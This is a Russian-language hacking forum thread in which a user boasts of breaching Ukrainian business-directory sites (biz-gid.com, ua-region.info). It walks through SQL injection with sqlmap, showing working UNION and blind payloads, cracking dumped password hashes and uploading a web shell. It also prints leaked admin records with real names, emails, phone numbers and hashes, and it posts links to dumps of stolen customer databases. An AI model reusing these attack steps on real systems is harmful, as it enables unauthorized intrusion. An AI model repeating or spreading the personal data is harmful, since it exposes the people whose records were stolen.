1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Как был взломан ua-region.info! Дампы тут!

Тема в разделе "Web-хакинг", создана пользователем FuWhite, 26 окт 2014.

  1. FuWhite
    FuWhite Новичок
    Симпатии:
    2
    Привет, хлопцы,

    Сегодня я поведаю о том, как был взломано несколько порталов, которые продают информационные базы данных (по предприятиям Украины).

    Делать было нечего, дело было вечером...oO

    Ну типа я планирую выкладывать и другие истории взломов и сливов, так что оставайтесь тут на форуме и ждите новых разоблачений *mrgreen* :pivo:

    Ну типа, Hack The Planet что ли...

    Как всегда случается, на сайт я вышел случайно (данный взлом не по заказу).

    И это был первый сайт из серии проектов одной конторы.

    Первым под удар попал biz-gid.com

    Хуйс запросы, поиск поддоменов по днс, поиск других сайтов зареганных на одного и того же владельца - ничего особенного и сверхординарного.

    Сайт сделан какой то убогой (по дизайну) студией.

    Поиск скриптов с параметрами и находим http://biz-gid.com/about/articles_bg?id=76

    Запрос http://biz-gid.com/about/articles_bg?id=76' - открывает пустую страницу. Вуаля, возможный вектор для атаки.

    Загоняем в скулмап (sqlmap.org) и обнаруживаем

    PHP:
    PlaceGET
    Parameter
    id
        Type
    boolean-based blind
        Title
    : AND boolean-based blind WHERE or HAVING clause
        Payload
    id=73 AND 3669=3669

        Type
    UNION query
        Title
    MySQL UNION query (NULL) - 4 columns
        Payload
    id=-8581 UNION ALL SELECT NULL,NULL,CONCAT(0x7164776b71,0x4447436e417a6a6a476e,0x7172756c71),NULL#
    ---
    web application technologyPHP 5.3.9Apache 2.2.17
    back
    -end DBMSMySQL 5
    banner
    :    '5.5.20-log'
    current user:    'bg@%'
    current database:    'bg'
    available databases [4]:
    [*] 
    bg
    [*] information_schema
    [*] kievmap
    [*] meccano
    Как обычно ищем логины и пароли. Узнаем, что на серваке лежит OpenX (система для прокрутки банеров) по адресу ra.biz-gid.com, сливаем хешированные пароли.

    PHP:
    Tablexopen_users
    [1 entry]
    +---------+-------------+--------------------+--------+----------+----------+----------------------------------+------------+--------------+--------------+--------------------------+---------------+---------------------+
    user_id sso_user_id default_account_id active username comments password                         language   date_created contact_name email_address            email_updated date_last_login     |
    +---------+-------------+--------------------+--------+----------+----------+----------------------------------+------------+--------------+--------------+--------------------------+---------------+---------------------+
    1       NULL        3                  1      editor   NULL     7b91469c45e48c0e9815374250187f97 ru         NULL         Your Name    webmaster@kievmap.com.ua NULL          2014-10-15 11:33:24 |
    +---------+-------------+--------------------+--------+----------+----------+----------------------------------+------------+--------------+--------------+--------------------------+---------------+---------------------+
    Скармливаем в hashkiller.co.uk, получаем пароли, заходим в админку OpenX, но тут ждал облом.

    Залить шелл не вышло.

    Ищем админку основного сайта. Никуя нет. Че за нах. Очередной запрос в скулмап и узнаем что в таблице пользователей есть поле customer_type. Короче ясно. У некоторых пользователей есть админ полномочия.

    Делаем запрос типа select * from bg.customers where customer_type != 0

    Получаем логины и хешированные пароли админов.

    PHP:
    web application technologyPHP 5.3.9Apache 2.2.17
    back
    -end DBMSMySQL 5
    select 
    from bg.customers where customer_type != [14]:
    [*] 
    102014-10-23 15:58:3310Евгений41129, , Пикалов2014-10-23 15:06:58eugene@pikalov.kiev.ua, , 202cb962ac59075b964b07152d234b70, , 0000-00-00 00:00:00, , 0000-00-00 00:00:00
    [*] 102014-10-23 15:00:3610Елена41927, , , 2014-10-23 11:05:44karein@ukr.net, , 02d51633452b1c51b15c1531b19e36e722395262008-12-15 12:01:4862f5a8739ceac924f203574b7c8f81f22010-08-19 10:42:01
    [*] 102014-10-22 14:32:3310Антонов41929ЗамдиректораАлексей Николаевич2014-10-22 14:09:56kareinfo@online.ua, , 39c9f8542267dfa436c7c40b05211576(044537 28 072008-12-15 13:20:52dc175e1d5308a2630569442cb3f5b8ab2012-03-15 15:38:13
    [*] 102014-10-23 15:43:0011Вита64024112014-10-23 11:23:42vita-f@i.ua, , e10adc3949ba59abbe56e057f20f883e12009-12-07 11:53:37, , 0000-00-00 00:00:00
    [*] 102014-10-22 17:56:0510Евгений Владимирович82729, , Крылов2014-10-22 15:19:38studio@cleardesign.com.ua, , 81dc9bdb52d04dc20036dbd8313ed055229-81-012011-02-09 11:07:04, , 0000-00-00 00:00:00
    [*] 102014-10-23 10:10:4111Admin83448, , Maawal2014-10-22 18:27:28maawal.malych@gmail.com09314217366cd87f824892ab83050574d251e70c3a04453728072011-02-21 18:22:1154d5a3b021daebf603714730e31a67bf2014-07-11 18:19:12
    [*] 102014-10-22 13:41:2910Евгений98892ДиректорКрылов2014-10-13 11:53:59krylov@cleardesign.com.ua050 387 16 45ec0752e5dbcf84c554752569e3e82cb8, (044277-42-052012-03-19 16:55:36, , 0000-00-00 00:00:00
    [*] 102013-01-27 23:26:2711Дмитрий99216АдминистраторКраснов2013-01-20 20:35:34gavradk@ua.fm, +795336412858c01e2c451c5ecaa62edd109b6d30a9381234503072012-04-05 08:09:00, , 0000-00-00 00:00:00
    [*] 102014-10-23 10:32:2011Михайло 102022директорТроц2014-10-22 16:13:29mishatrots@ukr.net, , b04524d63dbf487b27a72c845fe57b62097 755 43 662012-08-20 19:23:076d77daac3cfecfa9385a1c87abcddb562014-09-17 12:18:00
    [*] 102014-10-22 14:56:2410Александр105121, , Длабик2014-10-22 10:30:42admin@ua-region.info, , 665d5a5c28f5beae6a1613d6a6b5211e097-28918612013-02-01 10:50:44, , 0000-00-00 00:00:00
    [*] 102014-05-16 10:37:0910Михайло105133директорСлишик2014-04-04 11:34:21mc_g@ukr.net, , e55243c8aff1f3872e98d9e4c9530e1b044 24478192013-02-01 15:16:48, , 0000-00-00 00:00:00
    [*] 102013-06-14 14:06:4310Наталия107669менеджерСамарская2013-06-14 13:59:54natali@contact.com.ua050-078-26-7239dcaf7a053dc372fbc391d4e6b5d693044-277-42-052013-06-06 15:25:59, , 0000-00-00 00:00:00
    [*] 102013-10-04 11:22:1711Роман108010БорисовичНекраш2013-10-04 09:38:47bizgid1@i.ua, +380963389333c8cea4a06227f6b08d53d04dee62eaf906424290442013-06-27 16:22:24, , 0000-00-00 00:00:00
    [*] 102013-04-03 12:20:3830Sasha100357Директор центра мираBokov2013-04-03 12:14:29dahanavar12@mail.ru068444444e9c319f539f232f80449e6af1ea841bf0684444442012-05-17 13:03:08, , 0000-00-00 00:00:00
    Проникаем в админ часть сайта, но и тут облом. Шелл не залить.

    Ну и пох. Делаем дамп юзеров. Больше 40 тыс. аккаунтов. Выложу чуть позже.

    По мере исследования узнаем о порталах ua-region.info, dlab.com.ua, databases.com.ua

    Все созданы одним чуваком, Длабиком Александром.

    И ситуация повторяется. Скан по whois, по гуглу, по поддоменам.

    Находим очередную дыру.

    PHP:
    web server operating systemLinux Fedora 20 (Heisenbug)
    web application technologyApache 2.4.6PHP 5.4.16
    back
    -end DBMSMySQL 5.0
    banner
    :    '5.5.31-log'
    current user:    'u61618@localhost'
    current database:    'u61618'
    available databases [9]:
    [*] 
    blog_dlab
    [*] c
    [*] crm_lviv_ua
    [*] dlab_db
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] test
    [*] u61618
    И тут, внимание, джек пот, пользователь u61618 с рут мать вашу правами.

    Это пи*дец какая дыра в конфигурации сервера.

    Заливаем шелл через блог (стоял на вордпресе, уже отключен) и проникаем внутрь.

    Делаем дампы и сливаем в сеть.

    _https://mega.co.nz/#!1RYhGAJC!i1tLwtgH6UIkccIYuo5ZfmqA0CrH_tshcALXWjWnDA0

    Это дамп базы данных ua-region.info

    Все что продает этот сайт в этом дампе.

    Есть также дампы файлов и дампы других баз данных с этого же сервака. Пишите, если надо, выложу

    Постскриптум. Берегите яйца в смысле следите за информационной безопасностью своих проектов. Заказываете анализ таким спецам как я и все будет зашибись :fuck:

    Hack The Planet :dance4:
     
    Последнее редактирование модератором: 26 окт 2014
    26 окт 2014
    2 пользователям это понравилось.
  2. Ding0
    Ding0 Новичок
    Симпатии:
    1
    Оч познавательно, спасибо. а на mega.co.nz ничё не отдаёт пишет "Enter decryption key"
     
    26 окт 2014
  3. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    нуллреф режет ссылку
     
    26 окт 2014
  4. FuWhite
    FuWhite Новичок
    Симпатии:
    2
    Клиенты _https://mega.co.nz/#!1YQ1TLzD!wjIyacoFiePUE1uZ8J02CzHuwEkHjWaMy5NsItwuiBA
    Клиенты до 2012 года _https://mega.co.nz/#!wQIETSZa!pqeSk_uuk-XiGF8yS_mipIITWjLXkQCthuBszTxVzoU

    Дампы таблиц клиентов, мыла, логины, пароли (хешированные)
     
    27 окт 2014
  5. FuWhite
    FuWhite Новичок
    Симпатии:
    2
    27 окт 2014

Поделиться этой страницей

Загрузка...